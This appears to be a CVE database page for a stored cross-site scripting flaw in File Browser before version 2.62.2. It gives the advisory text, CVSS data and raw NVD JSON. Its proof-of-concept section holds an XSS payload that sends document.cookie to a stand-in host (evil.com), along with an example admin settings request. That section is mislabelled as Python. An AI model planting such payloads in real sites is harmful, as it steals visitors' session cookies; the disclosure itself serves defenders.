CVE-2026-34530

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the SPA index page in File Browser is vulnerable to Stored Cross-Site Scripting (XSS) via admin-controlled branding fields. An admin who sets branding.name to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. This issue has been patched in version 2.62.2.

CVSS Details

CVSS Score

6.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE

File Browser < 2.62.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-34530: Stored XSS via Branding Name
// Attacker needs Admin privileges to set the branding.name.

// Malicious Payload to inject:
// <img src=x onerror=fetch('https://evil.com/log?c='+document.cookie)>

// Example HTTP Request to update settings (Conceptual):
/*
PUT /api/settings HTTP/1.1
Host: target-filebrowser.com
Authorization: Bearer <ADMIN_TOKEN>
Content-Type: application/json

{
  "branding": {
    "name": "<script>console.log('XSS');alert(1)</script>"
  }
}
*/

// Upon visiting the homepage, the script executes for all users.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34530
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34530
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34530/
[4] VulDB https://vuldb.com/cve/CVE-2026-34530
[5] https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2
[6] https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34530", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:17:00.993", "lastModified": "2026-04-06T20:34:21.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the SPA index page in File Browser is vulnerable to Stored Cross-Site Scripting (XSS) via admin-controlled branding fields. An admin who sets branding.name to a malicious payload injects persistent JavaScript that executes for ALL visitors, including unauthenticated users. This issue has been patched in version 2.62.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.2", "matchCriteriaId": "A22210FE-83DA-49B9-A015-543942FE731F"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-xfqj-3vmx-63wv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}